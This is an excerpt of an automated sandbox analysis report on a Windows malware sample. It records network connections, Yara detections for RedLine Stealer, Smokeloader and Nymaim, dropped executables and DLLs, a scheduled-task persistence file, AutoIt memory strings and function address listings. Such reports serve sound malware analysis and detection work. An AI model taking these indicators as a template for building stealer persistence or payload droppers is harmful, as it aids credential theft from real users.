                          Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50018 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50024 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50030 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50039 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50054 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50069 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50078 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50079 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50082 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50083 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50084 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50085 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50088 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50089 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50090 version: TLS 1.2

                          E-Banking Fraud

                          barindex
                          Yara detected Nymaim
                          Source: Yara matchFile source: 26.2.e6d73861f4.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 26.2.e6d73861f4.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 26.2.e6d73861f4.exe.4b30e67.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 26.3.e6d73861f4.exe.4cf0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000001A.00000002.3436535456.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001A.00000003.3209738665.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001A.00000002.3419472143.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY

                          System Summary

                          barindex
                          Malicious sample detected (through community Yara rule)
                          Source: 0000001A.00000002.3429190490.0000000000E3A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                          Source: 0000001A.00000002.3436535456.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                          Binary is likely a compiled AutoIt script file
                          Source: 1b3b76c439.exe, 00000021.00000000.3265874051.0000000000D62000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f22fd09c-0
                          Source: 1b3b76c439.exe, 00000021.00000000.3265874051.0000000000D62000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_7d2f8800-c
                          PE file contains section with special chars
                          Source: file.exeStatic PE information: section name:
                          Source: file.exeStatic PE information: section name: .idata
                          Source: file.exeStatic PE information: section name:
                          Source: random[1].exe.0.drStatic PE information: section name:
                          Source: random[1].exe.0.drStatic PE information: section name: .idata
                          Source: EBFBFBFIIJ.exe.0.drStatic PE information: section name:
                          Source: EBFBFBFIIJ.exe.0.drStatic PE information: section name: .idata
                          Source: skotes.exe.21.drStatic PE information: section name:
                          Source: skotes.exe.21.drStatic PE information: section name: .idata
                          Source: rhnew[1].exe.22.drStatic PE information: section name:
                          Source: rhnew[1].exe.22.drStatic PE information: section name: .idata
                          Source: rhnew[1].exe.22.drStatic PE information: section name:
                          Source: rhnew.exe.22.drStatic PE information: section name:
                          Source: rhnew.exe.22.drStatic PE information: section name: .idata
                          Source: rhnew.exe.22.drStatic PE information: section name:
                          Source: random[1].exe.22.drStatic PE information: section name:
                          Source: random[1].exe.22.drStatic PE information: section name: .idata
                          Source: random[1].exe.22.drStatic PE information: section name:
                          Source: e6d73861f4.exe.22.drStatic PE information: section name:
                          Source: e6d73861f4.exe.22.drStatic PE information: section name: .idata
                          Source: e6d73861f4.exe.22.drStatic PE information: section name:
                          Source: random[1].exe0.22.drStatic PE information: section name:
                          Source: random[1].exe0.22.drStatic PE information: section name: .idata
                          Source: random[1].exe0.22.drStatic PE information: section name:
                          Source: fc1511c233.exe.22.drStatic PE information: section name:
                          Source: fc1511c233.exe.22.drStatic PE information: section name: .idata
                          Source: fc1511c233.exe.22.drStatic PE information: section name:
                          Source: random[2].exe.22.drStatic PE information: section name:
                          Source: random[2].exe.22.drStatic PE information: section name: .idata
                          Source: random[2].exe.22.drStatic PE information: section name:
                          Source: 6ae2430bb1.exe.22.drStatic PE information: section name:
                          Source: 6ae2430bb1.exe.22.drStatic PE information: section name: .idata
                          Source: 6ae2430bb1.exe.22.drStatic PE information: section name:
                          Source: random[2].exe0.22.drStatic PE information: section name:
                          Source: random[2].exe0.22.drStatic PE information: section name: .idata
                          Source: f9882ce6c1.exe.22.drStatic PE information: section name:
                          Source: f9882ce6c1.exe.22.drStatic PE information: section name: .idata
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9DB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,0_2_6C9DB700
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9DB8C0 rand_s,NtQueryVirtualMemory,0_2_6C9DB8C0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9DB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,0_2_6C9DB910
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C97F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,0_2_6C97F280
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 22_2_0089CB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,22_2_0089CB97
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9735A00_2_6C9735A0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C986C800_2_6C986C80
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9D34A00_2_6C9D34A0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9DC4A00_2_6C9DC4A0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C99D4D00_2_6C99D4D0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9864C00_2_6C9864C0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9B6CF00_2_6C9B6CF0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C97D4E00_2_6C97D4E0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9B5C100_2_6C9B5C10
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9C2C100_2_6C9C2C10
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9EAC000_2_6C9EAC00
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9E542B0_2_6C9E542B
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9E545C0_2_6C9E545C
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9854400_2_6C985440
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9B0DD00_2_6C9B0DD0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9D85F00_2_6C9D85F0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9A05120_2_6C9A0512
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C99ED100_2_6C99ED10
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C98FD000_2_6C98FD00
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C995E900_2_6C995E90
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9DE6800_2_6C9DE680
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9D4EA00_2_6C9D4EA0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C97BEF00_2_6C97BEF0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C98FEF00_2_6C98FEF0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9E76E30_2_6C9E76E3
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9B7E100_2_6C9B7E10
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9C56000_2_6C9C5600
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9D9E300_2_6C9D9E30
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C999E500_2_6C999E50
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9B3E500_2_6C9B3E50
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9C2E4E0_2_6C9C2E4E
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9946400_2_6C994640
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C97C6700_2_6C97C670
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9E6E630_2_6C9E6E63
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9C77A00_2_6C9C77A0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9A6FF00_2_6C9A6FF0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C97DFE00_2_6C97DFE0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9B77100_2_6C9B7710
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C989F000_2_6C989F00
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9A60A00_2_6C9A60A0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9E50C70_2_6C9E50C7
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C99C0E00_2_6C99C0E0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9B58E00_2_6C9B58E0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9878100_2_6C987810
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9BB8200_2_6C9BB820
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9C48200_2_6C9C4820
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9988500_2_6C998850
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C99D8500_2_6C99D850
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9BF0700_2_6C9BF070
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9B51900_2_6C9B5190
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9D29900_2_6C9D2990
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9AD9B00_2_6C9AD9B0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C97C9A00_2_6C97C9A0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C99A9400_2_6C99A940
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9CB9700_2_6C9CB970
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9EB1700_2_6C9EB170
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C98D9600_2_6C98D960
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9EBA900_2_6C9EBA90
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C98CAB00_2_6C98CAB0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9E2AB00_2_6C9E2AB0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9722A00_2_6C9722A0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9A4AA00_2_6C9A4AA0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9B8AC00_2_6C9B8AC0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C991AF00_2_6C991AF0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9BE2F00_2_6C9BE2F0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9B9A600_2_6C9B9A60
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C97F3800_2_6C97F380
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9E53C80_2_6C9E53C8
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9BD3200_2_6C9BD320
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9753400_2_6C975340
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C98C3700_2_6C98C370
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA1ECC00_2_6CA1ECC0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA7ECD00_2_6CA7ECD0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAFAC300_2_6CAFAC30
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAE6C000_2_6CAE6C00
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA2AC600_2_6CA2AC60
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA24DB00_2_6CA24DB0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAB6D900_2_6CAB6D90
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CBACDC00_2_6CBACDC0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CBA8D200_2_6CBA8D20
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAEED700_2_6CAEED70
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CB4AD500_2_6CB4AD50
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAA6E900_2_6CAA6E90
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA2AEC00_2_6CA2AEC0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAC0EC00_2_6CAC0EC0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CB00E200_2_6CB00E20
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CABEE700_2_6CABEE70
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CB68FB00_2_6CB68FB0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA2EFB00_2_6CA2EFB0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA20FE00_2_6CA20FE0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAFEFF00_2_6CAFEFF0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CB60F200_2_6CB60F20
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA26F100_2_6CA26F10
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAE2F700_2_6CAE2F70
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA8EF400_2_6CA8EF40
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CB268E00_2_6CB268E0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA708200_2_6CA70820
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAAA8200_2_6CAAA820
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAF48400_2_6CAF4840
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAB09A00_2_6CAB09A0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CADA9A00_2_6CADA9A0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAE09B00_2_6CAE09B0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CB3C9E00_2_6CB3C9E0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA549F00_2_6CA549F0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA769000_2_6CA76900
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA589600_2_6CA58960
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA9EA800_2_6CA9EA80
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAD8A300_2_6CAD8A30
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CACEA000_2_6CACEA00
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA9CA700_2_6CA9CA70
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAC0BA00_2_6CAC0BA0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CB26BE00_2_6CB26BE0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CB4A4800_2_6CB4A480
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA664D00_2_6CA664D0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CABA4D00_2_6CABA4D0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA844200_2_6CA84420
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAAA4300_2_6CAAA430
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA384600_2_6CA38460
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA145B00_2_6CA145B0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAEA5E00_2_6CAEA5E0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAAE5F00_2_6CAAE5F0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA825600_2_6CA82560
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAC05700_2_6CAC0570
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CB685500_2_6CB68550
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA785400_2_6CA78540
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CB245400_2_6CB24540
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA7E6E00_2_6CA7E6E0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CABE6E00_2_6CABE6E0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA446D00_2_6CA446D0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA7C6500_2_6CA7C650
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA4A7D00_2_6CA4A7D0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAA07000_2_6CAA0700
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA300B00_2_6CA300B0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAFC0B00_2_6CAFC0B0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA180900_2_6CA18090
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAEC0000_2_6CAEC000
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAE80100_2_6CAE8010
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA6E0700_2_6CA6E070
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA201E00_2_6CA201E0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CB041300_2_6CB04130
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA961300_2_6CA96130
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA881400_2_6CA88140
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAF22A00_2_6CAF22A0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAEE2B00_2_6CAEE2B0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CBA62C00_2_6CBA62C0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAF82200_2_6CAF8220
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAEA2100_2_6CAEA210
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAA82600_2_6CAA8260
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAB82500_2_6CAB8250
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA523A00_2_6CA523A0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA7E3B00_2_6CA7E3B0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA743E00_2_6CA743E0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA923200_2_6CA92320
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CB623700_2_6CB62370
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA223700_2_6CA22370
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CB3C3600_2_6CB3C360
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAB63700_2_6CAB6370
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeCode function: 21_2_00ED5C8321_2_00ED5C83
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeCode function: 21_2_00ED735A21_2_00ED735A
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeCode function: 21_2_00F1886021_2_00F18860
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeCode function: 21_2_00ED4DE021_2_00ED4DE0
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeCode function: 21_2_00ED4B3021_2_00ED4B30
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 22_2_0088E53022_2_0088E530
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 22_2_008A619222_2_008A6192
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 22_2_008C886022_2_008C8860
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 22_2_00884B3022_2_00884B30
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 22_2_00884DE022_2_00884DE0
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 22_2_008C2D1022_2_008C2D10
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 22_2_008A0E1322_2_008A0E13
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 22_2_008C704922_2_008C7049
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 22_2_008C31A822_2_008C31A8
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 22_2_0098968022_2_00989680
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 22_2_008A160222_2_008A1602
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 22_2_008C779B22_2_008C779B
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 22_2_008C78BB22_2_008C78BB
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 22_2_008A3DF122_2_008A3DF1
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 22_2_008B7F3622_2_008B7F36
                          Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                          Source: Joe Sandbox ViewDropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0089D942 appears 84 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0089D663 appears 38 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0089D64E appears 53 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0089DF80 appears 46 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00897A00 appears 38 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 008980C0 appears 133 times
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeCode function: String function: 00EE80C0 appears 130 times
                          Source: C:\Users\user\Desktop\file.exeCode function: String function: 6CBA09D0 appears 215 times
                          Source: C:\Users\user\Desktop\file.exeCode function: String function: 6CA49B10 appears 50 times
                          Source: C:\Users\user\Desktop\file.exeCode function: String function: 6CA43620 appears 56 times
                          Source: C:\Users\user\Desktop\file.exeCode function: String function: 6CBAD930 appears 39 times
                          Source: C:\Users\user\Desktop\file.exeCode function: String function: 6CBADAE0 appears 48 times
                          Source: C:\Users\user\Desktop\file.exeCode function: String function: 6C9B94D0 appears 90 times
                          Source: C:\Users\user\Desktop\file.exeCode function: String function: 6C9ACBE8 appears 134 times
                          Source: file.exe, 00000000.00000002.2756268933.0000000023AAD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs file.exe
                          Source: file.exe, 00000000.00000002.2756268933.0000000023AAD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs file.exe
                          Source: file.exe, 00000000.00000002.2761290872.000000006CA02000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
                          Source: file.exe, 00000000.00000002.2762568742.000000006CBF5000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs file.exe
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: 0000001A.00000002.3429190490.0000000000E3A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                          Source: 0000001A.00000002.3436535456.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                          Source: file.exeStatic PE information: Section: oswdvyxj ZLIB complexity 0.9946977459016394
                          Source: rhnew[1].exe.22.drStatic PE information: Section: ZLIB complexity 1.000201798892989
